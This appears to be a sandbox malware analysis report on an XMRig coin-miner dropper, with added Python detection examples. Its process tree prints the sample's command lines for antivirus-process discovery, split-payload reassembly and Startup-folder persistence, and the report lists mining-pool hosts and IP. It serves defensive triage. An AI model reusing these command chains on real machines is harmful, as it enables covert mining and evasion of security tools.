

Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561926
MD5: 978752b65601018ddd10636b648b8e65
SHA1: 2c0e320cb0d84c6760a925d873d58e701e3e6cb1
SHA256: 8bf64a9906e8177eab206dac3a550bc5918213659f98eac6295b8e24184eb782
Tags: CoinMiner, exe, user-Bitsight

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
DNS related to crypt mining pools
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6432 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 978752B65601018DDD10636B648B8E65)
    • cmd.exe (PID: 3060 cmdline: "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1788 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3640 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 4828 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6488 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2228 cmdline: cmd /c md 29442 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 5452 cmdline: cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Reynolds.com (PID: 5772 cmdline: Reynolds.com l MD5: C63860691927D62432750013B5A20F5F)
        • cmd.exe (PID: 5160 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Reynolds.com (PID: 3640 cmdline: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com MD5: C63860691927D62432750013B5A20F5F)
          • explorer.exe (PID: 6504 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
            • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 4464 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 1776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ZeusChat.scr (PID: 6692 cmdline: "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M" MD5: C63860691927D62432750013B5A20F5F)
      • ZeusChat.scr (PID: 4444 cmdline: "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" MD5: C63860691927D62432750013B5A20F5F)
      • ZeusChat.scr (PID: 4148 cmdline: "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" MD5: C63860691927D62432750013B5A20F5F)
        • explorer.exe (PID: 3524 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
          • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
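The process tree above is the whole infection chain in command lines: the NSIS dropper runs a batch file that greps the output of tasklist for AV/EDR process names, reassembles a split payload with copy /b, runs the result as a .com, writes an [InternetShortcut] .url into the Startup folder pointing at a .js in AppData, and that script later launches a .scr which injects XMRig into a freshly started explorer.exe. The Python below is an added example written for this page, not code from Joe Sandbox or from the sample; it turns those command-line patterns into detection checks and runs them over a constructed set of process-creation events modelled on the tree (PIDs, paths and command lines copied from it, the copy /b list cut short, two benign controls added). The ProcEvent schema and the check names are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent ("" when unknown)


# Constructed events modelled on the report's process tree (PIDs, paths and
# command lines copied from it; the copy /b list is cut short; the last two
# events are benign controls). The event schema is this example's assumption.
SAMPLE_EVENTS = [
    ProcEvent(3060, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd',
              r"C:\Users\user\Desktop\file.exe"),
    ProcEvent(3640, r"C:\Windows\SysWOW64\findstr.exe",
              'findstr /I "wrsa opssvc"', r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(6488, r"C:\Windows\SysWOW64\findstr.exe",
              'findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"',
              r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(5452, r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games l",
              r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(5772, r"C:\Users\user\AppData\Local\Temp\29442\Reynolds.com",
              "Reynolds.com l", r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(5160, r"C:\Windows\System32\cmd.exe",
              r'cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit',
              r"C:\Users\user\AppData\Local\Temp\29442\Reynolds.com"),
    ProcEvent(1776, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js"',
              ""),
    ProcEvent(6692, r"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr",
              r'"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M"',
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(6504, r"C:\Windows\explorer.exe", "explorer.exe",
              r"C:\Users\user\AppData\Local\Temp\29442\Reynolds.com"),
    ProcEvent(1000, r"C:\Windows\explorer.exe", "explorer.exe",
              r"C:\Windows\System32\userinit.exe"),          # benign control
    ProcEvent(1001, r"C:\Windows\System32\tasklist.exe", "tasklist /svc",
              r"C:\Windows\System32\cmd.exe"),              # benign control
]

# Process names the sample greps for (taken from its two findstr command lines).
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "ekrn", "sophoshealth"}
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".cmd", ".bat", ".ps1")
EXPLORER_PARENTS = ("userinit.exe", "explorer.exe", "winlogon.exe")


def detect(ev: ProcEvent) -> list:
    """Return the names of the checks this event trips (empty list = clean)."""
    hits = []
    low, img, parent = ev.cmdline.lower(), ev.image.lower(), ev.parent_image.lower()

    # tasklist | findstr "<av names>": AV/EDR discovery before unpacking.
    if img.endswith("findstr.exe"):
        m = re.search(r'"([^"]+)"', ev.cmdline)
        tokens = set(m.group(1).lower().split()) if m else set()
        if tokens & AV_PROCESS_NAMES:
            hits.append("av-process-discovery")
    # copy /b a + b + c ... out: reassembling a split, high-entropy payload.
    if img.endswith("cmd.exe") and re.search(r"copy\s+/b\s", low) and low.count(" + ") >= 2:
        hits.append("chunked-payload-reassembly")
    # copy X X.cmd && X.cmd: give a dropped file a batch extension, then run it.
    if img.endswith("cmd.exe") and re.search(r"copy\s+(\S+)\s+\1\.cmd\s*&&\s*\1\.cmd", low):
        hits.append("rename-and-run-batch")
    # echo [InternetShortcut] ... URL=<local script> written into the Startup folder.
    if ("[internetshortcut]" in low and STARTUP_DIR in low
            and re.search(r'url="?[a-z]:\\', low) and any(e in low for e in SCRIPT_EXT)):
        hits.append("startup-url-to-local-script")
    # wscript/cscript running a script out of the user profile.
    if img.endswith(("wscript.exe", "cscript.exe")) and re.search(
            r'\\appdata\\[^"]*\.(js|jse|vbs|vbe|wsf)\b', low):
        hits.append("wsh-script-from-appdata")
    # Script host launching a renamed PE (.scr/.com/.pif) from AppData.
    if (parent.endswith(("wscript.exe", "cscript.exe"))
            and img.endswith((".scr", ".com", ".pif")) and "\\appdata\\" in img):
        hits.append("script-host-spawns-renamed-pe")
    # explorer.exe started by something other than its normal parents: a fresh
    # explorer created by a user-land binary is the classic injection target.
    if img.endswith("\\explorer.exe") and parent and not parent.endswith(EXPLORER_PARENTS):
        hits.append("explorer-unusual-parent")
    # A .com executable run straight out of %TEMP%.
    if img.endswith(".com") and "\\appdata\\local\\temp\\" in img:
        hits.append("com-from-temp")
    return hits


def triage(events) -> dict:
    """Map PID -> tripped checks, for events that tripped at least one."""
    findings = {}
    for ev in events:
        hits = detect(ev)
        if hits:
            findings[ev.pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, hits)
```

Each check corresponds to one edge of the tree, so a hit on two or three of them in the same lineage is far stronger than any single one; the benign explorer.exe and tasklist events trip nothing, which is the point of carrying controls in the sample set.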
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
00000017.00000002.2486993892.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Process Memory Space: explorer.exe PID: 6504 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Process Memory Space: explorer.exe PID: 3524 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Source | Rule | Description | Author | Strings
23.2.explorer.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
23.2.explorer.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
  • 0x432ee0:$x1: donate.ssl.xmrig.com
23.2.explorer.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen |
  • 0x433888:$s1: %s/%s (Windows NT %lu.%lu
  • 0x437380:$s3: \\.\WinRing0_
  • 0x3e4928:$s4: pool_wallet
  • 0x3e0698:$s5: cryptonight
  • 0x3e06a8:$s5: cryptonight
  • 0x3e06b8:$s5: cryptonight
  • 0x3e06c8:$s5: cryptonight
  • 0x3e06e0:$s5: cryptonight
  • 0x3e06f0:$s5: cryptonight
  • 0x3e0700:$s5: cryptonight
  • 0x3e0718:$s5: cryptonight
  • 0x3e0728:$s5: cryptonight
  • 0x3e0740:$s5: cryptonight
  • 0x3e0758:$s5: cryptonight
  • 0x3e0768:$s5: cryptonight
  • 0x3e0778:$s5: cryptonight
  • 0x3e0788:$s5: cryptonight
  • 0x3e07a0:$s5: cryptonight
  • 0x3e07b8:$s5: cryptonight
  • 0x3e07c8:$s5: cryptonight
  • 0x3e07d8:$s5: cryptonight

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , ProcessId: 1776, ProcessName: wscript.exe
Source: Process started; Author: Tim Rauch; Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: explorer.exe, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6504, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 5768, ProcessName: conhost.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com, ProcessId: 5772, TargetFilename: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6432, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd, ProcessId: 3060, ProcessName: cmd.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com, ProcessId: 5772, TargetFilename: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" , ProcessId: 1776, ProcessName: wscript.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 5160, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3060, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6488, ProcessName: findstr.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 96.4% probability

Bitcoin Miner

Source: Yara match; File source: 23.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000017.00000002.2486993892.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.3264299114.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: explorer.exe PID: 6504, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: explorer.exe PID: 3524, type: MEMORYSTR
Source: unknown; DNS query: name: xmr-eu2.nanopool.org
Source: explorer.exe, 00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: explorer.exe; String found in binary or memory: cryptonight/0
Source: explorer.exe, 00000017.00000002.2487104363.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: stratum+tcp://
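The Yara matches above (MAL_XMR_Miner_May19_1, MALWARE_Win_CoinMiner02) and the Bitcoin Miner indicators fire on a small, stable set of XMRig artefacts: the donate host, the WinRing0 device name, the pool_wallet config key, the cryptonight algorithm names, the stratum URL schemes and the User-Agent format string, together with a DNS query to a nanopool host. The Python below is an added example written for this page, not code from Joe Sandbox or from the rule authors; it is a yara-less triage scanner that looks for exactly those strings in a memory dump, pulls any stratum URL and port out of it, and cross-checks queried DNS names against the pool domains seen in this report. SAMPLE_DUMP is a constructed stand-in for the unpacked explorer.exe image, the descriptions attached to each string and the verdict threshold are this example's own assumptions.

```python
import re

# Indicator strings taken from the Yara matches and the Bitcoin Miner section
# of the report; the descriptions are this example's own annotations.
MINER_STRINGS = {
    b"donate.ssl.xmrig.com": "XMRig donate-pool host ($x1 in MAL_XMR_Miner_May19_1)",
    b"\\\\.\\WinRing0_": "WinRing0 driver device name (MSR access used by RandomX miners)",
    b"pool_wallet": "XMRig config key",
    b"cryptonight": "CryptoNight algorithm family name",
    b"stratum+tcp://": "stratum pool URL scheme",
    b"stratum+ssl://": "stratum-over-TLS pool URL scheme",
    b"%s/%s (Windows NT %lu.%lu": "XMRig User-Agent format string",
}
# Pool hostname and optional port inside any stratum URL.
STRATUM_URL = re.compile(rb"stratum\+(?:tcp|ssl)://([A-Za-z0-9.\-]+)(?::(\d{1,5}))?")
# Mining-pool domains that appear in this report (DNS query and embedded pool URL).
POOL_DOMAINS = ("nanopool.org", "xmrig.com")


def scan_dump(buf: bytes) -> dict:
    """Find miner indicator strings (with offsets) and stratum pool URLs in a dump."""
    strings = {}
    for needle, desc in MINER_STRINGS.items():
        offsets = [m.start() for m in re.finditer(re.escape(needle), buf)]
        if offsets:
            strings[needle.decode()] = {"desc": desc, "offsets": offsets}
    pools = [(m.group(1).decode(), int(m.group(2)) if m.group(2) else None)
             for m in STRATUM_URL.finditer(buf)]
    return {"strings": strings, "stratum": pools, "score": len(strings) + len(pools)}


def is_pool_domain(name: str) -> bool:
    """True when a queried name is, or sits under, a known mining-pool domain."""
    n = name.lower().rstrip(".")
    return any(n == d or n.endswith("." + d) for d in POOL_DOMAINS)


def triage(buf: bytes, dns_names) -> dict:
    """Combine memory and DNS evidence into one verdict (threshold is an assumption)."""
    result = scan_dump(buf)
    result["pool_dns"] = [n for n in dns_names if is_pool_domain(n)]
    result["verdict"] = "miner" if result["score"] >= 3 or result["stratum"] else "clean"
    return result


# Constructed stand-in for the unpacked explorer.exe image: the report's strings
# separated by zero filler, including the stratum URL it found in memory.
SAMPLE_DUMP = (
    b"\x00" * 64 + b"stratum+ssl://randomx.xmrig.com:443\x00"
    + b"\x00" * 32 + b"cryptonight/0\x00cryptonight/1\x00"
    + b"\x00" * 16 + b"pool_wallet\x00donate.ssl.xmrig.com\x00"
    + b"\x00" * 16 + b"\\\\.\\WinRing0_\x00stratum+tcp://\x00"
    + b"%s/%s (Windows NT %lu.%lu.%lu)\x00"
)
# Constructed benign buffer for comparison.
CLEAN_DUMP = b"\x00" * 32 + b"This program cannot be run in DOS mode.\x00"
# DNS names from the Networking section plus a benign control.
SAMPLE_DNS = ["xmr-eu2.nanopool.org", "DqnJUgbSFuO.DqnJUgbSFuO", "example.com"]


if __name__ == "__main__":
    r = triage(SAMPLE_DUMP, SAMPLE_DNS)
    print(r["verdict"], r["stratum"], r["pool_dns"])
    for s, info in r["strings"].items():
        print(f"{s!r} @ {[hex(o) for o in info['offsets']]}: {info['desc']}")
```

The caveat the Malpedia description above already hints at: every one of these strings is present in a legitimately installed XMRig, so the string hits alone only say "this is XMRig". What turns this report into a malware verdict is where they were found: inside the address space of explorer.exe, a process that has no business containing a miner, reached through the injection chain in the process tree.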
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: autorunsc64a.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: autorunsc64a.pdb= source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Autoruns.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Autoruns64a.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Autoruns64.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: autorunsc.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: utorunsc.pdb source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: explorer.exe, 00000012.00000003.2516037085.00000000054AC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3265796424.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2312256260.0000000001350000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354445600.00000000054AC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703350861.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2672721393.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2550085788.00000000054CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: utorunsc64.pdb source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: autorunsc64.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: utoruns64a.pdb source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00406301 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com; Code function: 17_2_00007FF7AA132DE0 FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com; Code function: 17_2_00007FF7AA16CE3C GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr; Code function: 20_2_00007FF752042DE0 FindFirstFileExW
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr; Code function: 20_2_00007FF75207CE3C GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\29442
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\29442\

Networking

Source: C:\Windows\explorer.exe; Network Connect: 163.172.171.111:10343
Source: global traffic; TCP traffic: 192.168.2.5:49735 -> 163.172.171.111:10343
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported three times)
Source: global traffic; DNS traffic detected: DNS query: DqnJUgbSFuO.DqnJUgbSFuO
Source: global traffic; DNS traffic detected: DNS query: xmr-eu2.nanopool.org
Source: file.exe; String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: explorer.exe, 00000012.00000002.3265796424.0000000005480000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
